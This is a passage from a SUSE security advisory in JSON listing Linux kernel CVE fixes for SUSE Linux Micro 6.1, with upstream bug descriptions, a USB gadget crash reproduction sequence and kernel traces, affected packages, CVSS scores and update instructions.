"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68327",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68327"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: renesas_usbhs: Fix synchronous external abort on unbind\n\nA synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is\nexecuted after the configuration sequence described above:\n\nmodprobe usb_f_ecm\nmodprobe libcomposite\nmodprobe configfs\ncd /sys/kernel/config/usb_gadget\nmkdir -p g1\ncd g1\necho \"0x1d6b\" \u003e idVendor\necho \"0x0104\" \u003e idProduct\nmkdir -p strings/0x409\necho \"0123456789\" \u003e strings/0x409/serialnumber\necho \"Renesas.\" \u003e strings/0x409/manufacturer\necho \"Ethernet Gadget\" \u003e strings/0x409/product\nmkdir -p functions/ecm.usb0\nmkdir -p configs/c.1\nmkdir -p configs/c.1/strings/0x409\necho \"ECM\" \u003e configs/c.1/strings/0x409/configuration\n\nif [ ! -L configs/c.1/ecm.usb0 ]; then\n ln -s functions/ecm.usb0 configs/c.1\nfi\n\necho 11e20000.usb \u003e UDC\necho 11e20000.usb \u003e /sys/bus/platform/drivers/renesas_usbhs/unbind\n\nThe displayed trace is as follows:\n\n Internal error: synchronous external abort: 0000000096000010 [#1] SMP\n CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT\n Tainted: [M]=MACHINE_CHECK\n Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT)\n pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs]\n lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs]\n sp : ffff8000838b3920\n x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000\n x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810\n x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000\n x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020\n x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344\n x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000\n x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418\n x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d\n x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80\n Call trace:\n usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P)\n usbhsg_pullup+0x4c/0x7c [renesas_usbhs]\n usb_gadget_disconnect_locked+0x48/0xd4\n gadget_unbind_driver+0x44/0x114\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_release_driver+0x18/0x24\n bus_remove_device+0xcc/0x10c\n device_del+0x14c/0x404\n usb_del_gadget+0x88/0xc0\n usb_del_gadget_udc+0x18/0x30\n usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs]\n usbhs_mod_remove+0x20/0x30 [renesas_usbhs]\n usbhs_remove+0x98/0xdc [renesas_usbhs]\n platform_remove+0x20/0x30\n device_remove+0x4c/0x80\n device_release_driver_internal+0x1c8/0x224\n device_driver_detach+0x18/0x24\n unbind_store+0xb4/0xb8\n drv_attr_store+0x24/0x38\n sysfs_kf_write+0x7c/0x94\n kernfs_fop_write_iter+0x128/0x1b8\n vfs_write+0x2ac/0x350\n ksys_write+0x68/0xfc\n __arm64_sys_write+0x1c/0x28\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0xc0/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: stratix10-svc: fix bug in saving controller data\n\nFix the incorrect usage of platform_set_drvdata and dev_set_drvdata. They\nboth are of the same data and overrides each other. This resulted in the\nrmmod of the svc driver to fail and throw a kernel panic for kthread_stop\nand fifo free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68328",
"url": "https://www.suse.com/security/cve/CVE-2025-68328"
},
{
"category": "external",
"summary": "SUSE Bug 1255489 for CVE-2025-68328",
"url": "https://bugzilla.suse.com/1255489"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68328"
},
{
"cve": "CVE-2025-68330",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68330"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: accel: bmc150: Fix irq assumption regression\n\nThe code in bmc150-accel-core.c unconditionally calls\nbmc150_accel_set_interrupt() in the iio_buffer_setup_ops,\nsuch as on the runtime PM resume path giving a kernel\nsplat like this if the device has no interrupts:\n\nUnable to handle kernel NULL pointer dereference at virtual\n address 00000001 when read\n\nPC is at bmc150_accel_set_interrupt+0x98/0x194\nLR is at __pm_runtime_resume+0x5c/0x64\n(...)\nCall trace:\nbmc150_accel_set_interrupt from bmc150_accel_buffer_postenable+0x40/0x108\nbmc150_accel_buffer_postenable from __iio_update_buffers+0xbe0/0xcbc\n__iio_update_buffers from enable_store+0x84/0xc8\nenable_store from kernfs_fop_write_iter+0x154/0x1b4\n\nThis bug seems to have been in the driver since the beginning,\nbut it only manifests recently, I do not know why.\n\nStore the IRQ number in the state struct, as this is a common\npattern in other drivers, then use this to determine if we have\nIRQ support or not.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68330",
"url": "https://www.suse.com/security/cve/CVE-2025-68330"
},
{
"category": "external",
"summary": "SUSE Bug 1255493 for CVE-2025-68330",
"url": "https://bugzilla.suse.com/1255493"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68330"
},
{
"cve": "CVE-2025-68331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer\n\nWhen a UAS device is unplugged during data transfer, there is\na probability of a system panic occurring. The root cause is\nan access to an invalid memory address during URB callback handling.\nSpecifically, this happens when the dma_direct_unmap_sg() function\nis called within the usb_hcd_unmap_urb_for_dma() interface, but the\nsg-\u003edma_address field is 0 and the sg data structure has already been\nfreed.\n\nThe SCSI driver sends transfer commands by invoking uas_queuecommand_lck()\nin uas.c, using the uas_submit_urbs() function to submit requests to USB.\nWithin the uas_submit_urbs() implementation, three URBs (sense_urb,\ndata_urb, and cmd_urb) are sequentially submitted. Device removal may\noccur at any point during uas_submit_urbs execution, which may result\nin URB submission failure. However, some URBs might have been successfully\nsubmitted before the failure, and uas_submit_urbs will return the -ENODEV\nerror code in this case. The current error handling directly calls\nscsi_done(). In the SCSI driver, this eventually triggers scsi_complete()\nto invoke scsi_end_request() for releasing the sgtable. The successfully\nsubmitted URBs, when being unlinked to giveback, call\nusb_hcd_unmap_urb_for_dma() in hcd.c, leading to exceptions during sg\nunmapping operations since the sg data structure has already been freed.\n\nThis patch modifies the error condition check in the uas_submit_urbs()\nfunction. When a UAS device is removed but one or more URBs have already\nbeen successfully submitted to USB, it avoids immediately invoking\nscsi_done() and save the cmnd to devinfo-\u003ecmnd array. If the successfully\nsubmitted URBs is completed before devinfo-\u003eresetting being set, then\nthe scsi_done() function will be called within uas_try_complete() after\nall pending URB operations are finalized. Otherwise, the scsi_done()\nfunction will be called within uas_zap_pending(), which is executed after\nusb_kill_anchored_urbs().\n\nThe error handling only takes effect when uas_queuecommand_lck() calls\nuas_submit_urbs() and returns the error value -ENODEV . In this case,\nthe device is disconnected, and the flow proceeds to uas_disconnect(),\nwhere uas_zap_pending() is invoked to call uas_try_complete().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68331",
"url": "https://www.suse.com/security/cve/CVE-2025-68331"
},
{
"category": "external",
"summary": "SUSE Bug 1255495 for CVE-2025-68331",
"url": "https://bugzilla.suse.com/1255495"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68331"
},
{
"cve": "CVE-2025-68332",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68332"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: c6xdigio: Fix invalid PNP driver unregistration\n\nThe Comedi low-level driver \"c6xdigio\" seems to be for a parallel port\nconnected device. When the Comedi core calls the driver\u0027s Comedi\n\"attach\" handler `c6xdigio_attach()` to configure a Comedi to use this\ndriver, it tries to enable the parallel port PNP resources by\nregistering a PNP driver with `pnp_register_driver()`, but ignores the\nreturn value. (The `struct pnp_driver` it uses has only the `name` and\n`id_table` members filled in.) The driver\u0027s Comedi \"detach\" handler\n`c6xdigio_detach()` unconditionally unregisters the PNP driver with\n`pnp_unregister_driver()`.\n\nIt is possible for `c6xdigio_attach()` to return an error before it\ncalls `pnp_register_driver()` and it is possible for the call to\n`pnp_register_driver()` to return an error (that is ignored). In both\ncases, the driver should not be calling `pnp_unregister_driver()` as it\ndoes in `c6xdigio_detach()`. (Note that `c6xdigio_detach()` will be\ncalled by the Comedi core if `c6xdigio_attach()` returns an error, or if\nthe Comedi core decides to detach the Comedi device from the driver for\nsome other reason.)\n\nThe unconditional call to `pnp_unregister_driver()` without a previous\nsuccessful call to `pnp_register_driver()` will cause\n`driver_unregister()` to issue a warning \"Unexpected driver\nunregister!\". This was detected by Syzbot [1].\n\nAlso, the PNP driver registration and unregistration should be done at\nmodule init and exit time, respectively, not when attaching or detaching\nComedi devices to the driver. (There might be more than one Comedi\ndevice being attached to the driver, although that is 